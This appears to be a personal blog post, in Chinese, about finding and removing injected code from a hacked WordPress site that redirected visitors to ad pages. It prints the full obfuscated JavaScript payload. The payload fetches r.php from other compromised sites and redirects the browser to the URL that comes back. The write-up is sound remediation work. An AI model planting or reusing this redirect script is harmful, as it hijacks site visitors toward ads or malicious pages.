Mr. Panda
Tech For Fun

[Wordpress] 修复 Wordpress 的流量劫持攻击

今天打开网站,发现网站有些异常,会跳转到一些奇怪的网址并显示广告,我起初以为是域名出了问题,但是发现通过IP地址访问也会跳转,由此我推断是网站除了问题,可能被注入了恶意代码。

通过咨询阿里云官方,说可能是注入了恶意代码,并且建议我更换为 https。出现问题的是网站无疑了。因此我查阅了网站的常见的可注入的 php 文件,发现几处可疑的代码。通过浏览器的调试,发现他请求了另一个网站的 r.php 文件。我打开了这个网站发现这个网站是国外网站,并且他的症状与我的类似,然后在另一个请求中发现一些奇怪的代码。

通过查阅资料,扫描我的网站,找到可疑代码如下:

eval(function(p, a, c, k, e, d) {
    e = function(c) {
        return (c < a ? '': e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
    };
    if (!''.replace(/^/, String)) {
        while (c--) {
            d[e(c)] = k[c] || e(c)
        }
        k = [function(e) {
            return d[e]
        }];
        e = function() {
            return '\\w+'
        };
        c = 1
    };
    while (c--) {
        if (k[c]) {
            p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c])
        }
    }
    return p
} ('9 w(c){5 8=" "+N.8;5 l=" "+c+"=";5 m=T;5 a=0;5 b=0;7(8.k>0){a=8.j(l);7(a!=-1){a+=l.k;b=8.j(";",a);7(b==-1){b=8.k}m=X(8.O(a,b))}}x(m)}9 I(c,J,d,g,i,n){N.8=c+"="+12(J)+((d)?"; d="+d:"")+((g)?"; g="+g:"")+((i)?"; i="+i:"")+((n)?"; n":"")}9 U(){5 3;F{3=h q("Y.v")}t(e){F{3=h q("V.v")}t(E){3=R}}7(!3&&14 D!=\'10\'){3=h D()}x 3}5 s=\'A://z.11.y/B-C/G/Z-W/13/1h/r.H\';5 K=\'A://z.1p.y.1o/B-C/G/1j/1l/r.H\';7(w(\'15\')!=\'S\'){9 P(){5 f=h 1k();f.1m(f.1n()+1r*1q*6*1);I(\'1i\',\'S\',f.1a())}9 o(Q,M){5 3=U();3.19(\'18\',Q,p);3.16=9(){7(3.17==4&&3.1b==1c){7(3.L.j(\'u=\')==0){P();1g.1f=3.L.O(2)}1e{7(M)o(K,R)}}};3.1d(T)}o(s,p)}', 62, 90, '|||xmlhttp||var||if|cookie|function|offset|end|name|expires||now|path|new|domain|indexOf|length|search|setStr|secure|lookupRedirect|true|ActiveXObject||sAdsUrl1|catch||XMLHTTP|getCookie|return|com|www|https|wp|content|XMLHttpRequest||try|themes|php|setCookie|value|sAdsUrl2|responseText|bIsFirst|document|substring|setAdsCookie|sUrl|false|complete|null|getXmlHttp|Microsoft|the7|unescape|Msxml2|dt|undefined|santecza|escape|woocommerce|typeof|newadsshow|onreadystatechange|readyState|GET|open|toGMTString|status|200|send|else|location|window|cart|newadshow|envision|Date|bbpress|setTime|getTime|tr|mavigrup|3600|1000'.split('|'), 0, {}))

我在文件中查找,找到了这些代码并删除,网站回复正常。

参考文件如下:

原来已经有了类似的案例:

黑客修改WordPress核心文件,劫持网站流量

How to Fix a Hacked WordPress Site

Free website security check & malware scanner

jonsam ng

jonsam ng

文章作者

海阔凭鱼跃,天高任鸟飞。

[Wordpress] 修复 Wordpress 的流量劫持攻击
今天打开网站,发现网站有些异常,会跳转到一些奇怪的网址并显示广告,我起初以为是域名出了问题,但是发现通过IP地址访问也会跳转,由此我推断是网站除了问题,可能被注入了恶意代码。 …
扫描二维码继续阅读
2019-11-14